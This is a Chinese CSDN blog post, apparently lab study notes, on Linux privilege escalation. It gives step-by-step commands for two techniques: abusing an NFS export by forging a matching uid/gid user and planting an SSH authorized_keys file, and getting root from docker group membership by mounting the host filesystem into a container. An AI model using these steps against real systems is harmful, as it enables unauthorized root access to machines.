nfs 挂载提权 + docker 用户组提权

已于 2023-09-08 16:13:35 修改
阅读量348 收藏 2
点赞数 2
文章标签: 服务器 linux 网络 docker 网络安全
于 2023-09-08 16:13:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55628907/article/details/132759676
版权

nfs 挂载提权

目标机器192.168.206.143 需开启2049 nfs端口

在攻击机kali安装nfs:

sudo apt-get install nfs-common

查看目标开放的文件夹

showmount -e 192.168.206.143

回显:/home/peter *  说明可挂载/home/peter的所有目录

创建用户(root权限下)

  1. 在本机创建一个peter用户并且uid为1001 gid为1005即可

  2. 创建组并指定组GID:

  3. groupadd -g 1005 peter

  4. 创建用户并指定uid以及gid:

  5. adduser peter -uid 1001 -gid 1005

 

生成公钥和私钥

ssh-keygen

将公钥复制到创建的挂载目录下

cat /home/peter/.ssh/id_rsa.pub > /111/.ssh/authorized_keys 

赋值权限

chmod 700 .ssh

chmod 600 authorized_keys

 

用ssh 连接

ssh peter@192.168.206.143

docker 提权

Docker 运行的所有命令都是需要 sudo 来运行,那是因为 docker 需要 root 权限才能跑。

Docker 监护进程有一个特性,它能被允许访问 root 用户或者是在 docker 组里面的所有用户,这就如同拥有 root 的访问权限。

如果一个服务器有一个普通的用户,并且这个用户加入了 docker 组,则这个用户已经是 root 了,默认情况下,Docker 软件包是会默认添加一个 docker 用户组

命令: id  查看当前用户组信息

查看用户组  cat /etc/group

提权(需要能够从外网拉镜像):

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

主要是有趣
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Linux提权姿势二:利用NFS提权
09-01
Linux提权姿势二:利用NFS提权
权限提升总结
Christ1na的博客
03-07 6069
提权 内网
权限提升-Linux系统权限提升篇&Vulnhub&PATH变量&NFS服务&Cron任务&配合SUID
siu~
03-31 414
1、Web或普通用户到Linux-服务安全配合SUID-NFS 2、普通用户到Linux-环境变量配合SUID-$PATH 3、Web或普通用户到Linux-计划任务权限不当-Cron 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
NFS挂载提权
m0_71300782的博客
09-08 274
2.点击你登录靶场虚拟机的用户名文件新建yige.ssh文件把公钥复制到这里面(.ssh是隐藏文件把它显示出来)authorized_keys(记得不要后缀)二、然后使用WinScp连接工具连接提权靶场。一、首先在kali的桌面创建公钥、私钥。发现在桌面创建了俩个文件夹,就是公私钥。ssh bob@提权靶场的ip地址。三、再回到kali在控制面板输入。1.在桌面打开控制面板shur。3.把公钥复制进去把文件名改成。1.使用WinScp连接。2.把公私钥复制到桌面。
Linux NFS文件挂载服务常用命令
年少青山的博客
10-11 4425
Linux NFS文件挂载服务常用命令
Docker -- NFS
qq_45742976的博客
08-20 688
网络存储基于标准网络协议实现数据传输,为网络中的Windows、Linux、max os等各种不同操作系统的计算机提供文件共享和数据备份。root_squach – 其他机器的root用户连接过来NFS服务的时候,不当做root用户对待,把他当做普通用户对待。缺点:性能一般,依赖于传统的tcp/ip网络,如果网络带宽不够大,影响是数据的传递,有丢失数据的风险和卡顿的问题。如今采用全闪存储的SAN。no_root_squash – 其他机器的root用户连接过来NFS服务的时候,当做root用户对待。
nfs的使用
m0_47584619的博客
07-16 967
nfs中rpcbind是非常重要的一个程序,nfs的所有端口都要向rpcbind注册,客户端的请求也要经过rpcbind,rpcbind就像是一个不可或缺的中间人。anongid:需要配合all_squash使用,将客户端的所有用户组在服务端映射为指定GID的用户组,该GID在服务端必须存在;anonuid:需要配合all_squash使用,将客户端的所有用户在服务端映射为指定UID的用户,该UID在服务端必须存在;async:异步,先将数据写到内存,然后再写入磁盘,效率较高,可能丢失数据;
基于kubernetes+docker+jenkins的DevOps实践
01-27
之前自己的项目开发就搭了个cicd的环境,那时候是在本就...jenkins+dockerregistry+docker 见之前的笔记 总的差不多这样:之后对kubernetes的接触后,就在之前的基础上加入kubernetes,其实也就是在服务器拉取镜像docker
Gitllab+Jenkins+Docker+Harbor 自动化部署流程
01-11
Gitllab+Jenkins+Docker+Harbor 自动化部署流程 一、 版本控制系统 Gitllab Gitllab 是一个基于 web 的 Git 仓库管理系统,提供了一个强大且灵活的平台来管理 Git 项目。 Gitllab 允许用户创建、管理和共享 Git ...
gitlab+jenkins+docker自动化部署脚本
12-30
gitlab+jenkins+docker自动化部署脚本,采用shell与python开发,其中python部分均为封装成型的逻辑,只接受shell传参就能完成项目构建
Django+Vue+Docker企业OA系统
最新发布
06-03
视频课程下载——Django+Vue+Docker企业OA系统
Docker容器支持宿主机软链接挂载、绑定挂载和卷的区别(bind mounts and volumes)、软链接的本质、symlinks、inode(挂载软链接时必须注意要将目标一并挂载了)
Dontla的博客
03-25 1485
serves as(用作:用来作为) a reference or pointer to another file or directory.符号链接或软链接,是一种文件,用作指向另一个文件或目录的引用或指针。
内网渗透-权限提升
qq_63980959的博客
04-05 1069
提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升webshell权限以夺得该服务器权限提权,顾名思义就是提高自己在服务器中的权限 ,比如在windows中本身登录的用户时guest,然后通过提权后就变成超级管理员(adminstrator),拥有了管理windwos的所有权限在Windwos中,权限大概分为四种,分别是Users、Administrator、System、TrustedInstaller。
【甄选靶场】Vulnhub百个项目渗透——项目四十四:44-pegasus:1(格式化字符串缓冲区溢出,nfs提权
人间体佐菲的博客
10-23 716
【甄选靶场】Vulnhub百个项目渗透——项目四十四:44-pegasus:1(格式化字符串缓冲区溢出,nfs提权
linux 提权总结
weixin_51681694的博客
06-13 6895
会继续补充.....
Docker容器中挂载NFS共享目录
网络资源是无限的
12-11 8657
之前在https://blog.csdn.net/fengbingchun/article/details/110561129 介绍过使用Dockerfile构建ubuntu 16.04镜像,并在容器中编译执行Messy_Test项目.这里介绍下如何在容器中挂载NFS服务器上的共享目录. Dockerfile内容如下: FROM ubuntu:16.04 LABEL maintainer="FengBingchun fengbingchun@163.com" \ version="1.0"
生命在于学习——Linux提权
易水哲的博客
11-03 1614
Linux提权的学习笔记记录。
提权及redis3种未授权访问
梳碧湖的砍柴人
10-07 651
redis及部分提权
docker用户组提权
Vicl1fe的博客
12-23 2332
关于docker提权 如果一个服务器有一个普通的用户,并且这个用户加入了docker组,则这个用户已经是root了。下面看具体操作 我创了一个用户,并且加入了docker组。 docker 组内用户执行命令的时候会自动在所有命令前添加 sudo。因为设计或者其他的原因,Docker 给予所有 docker 组的用户相当大的权力(虽然权力只体现在能访问 /var/run/docker.sock ...
es+docker+挂载目录
03-28
Docker 挂载目录是指将容器内的某个目录或文件与宿主机上的目录或文件进行关联,实现数据共享和持久化。在运行容器时可以使用 `-v` 或 `--mount` 参数来指定挂载目录的方式。 例如,下面的命令将宿主机上的 `/data`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值